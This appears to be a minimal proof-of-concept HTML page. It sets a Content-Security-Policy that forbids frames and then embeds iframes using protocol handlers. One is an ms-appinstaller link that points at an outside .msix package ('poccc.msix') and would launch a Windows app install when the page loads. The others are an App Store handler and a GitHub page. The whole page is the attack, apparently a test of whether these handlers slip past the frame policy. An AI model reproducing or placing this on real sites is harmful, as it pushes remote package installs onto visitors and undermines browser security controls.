<html>
    <meta
      http-equiv="Content-Security-Policy"
      content="default-src 'none'; script-src http: https: 'unsafe-inline'; style-src http: https: 'unsafe-inline';  img-src http: https:;
      font-src http: https:;
     connect-src http: https:;
     media-src http: https:;
     object-src 'none';
     child-src 'none';
     frame-src 'none'"
    >
    <body>
        <iframe src="itms-apps://?action=discover&referrer=app-store&itscg=10000&itsct=app-appstore-nav-200917"></iframe>
        <iframe src="ms-appinstaller:?source=https://xdv.cz/poccc.msix"></iframe>
        <iframe src="https://github.com/dev-kanishk/dev-kanishk.github.io/blob/main/index.html"></iframe>
    </body>
</html>
